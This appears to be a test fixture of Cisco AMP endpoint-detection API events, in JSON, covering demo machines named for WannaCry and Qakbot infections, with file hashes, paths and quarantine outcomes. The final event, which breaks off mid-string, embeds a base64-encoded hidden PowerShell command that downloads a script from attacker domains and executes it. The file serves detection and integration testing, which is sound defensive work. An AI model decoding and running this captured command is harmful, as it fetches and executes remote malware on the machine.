Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAI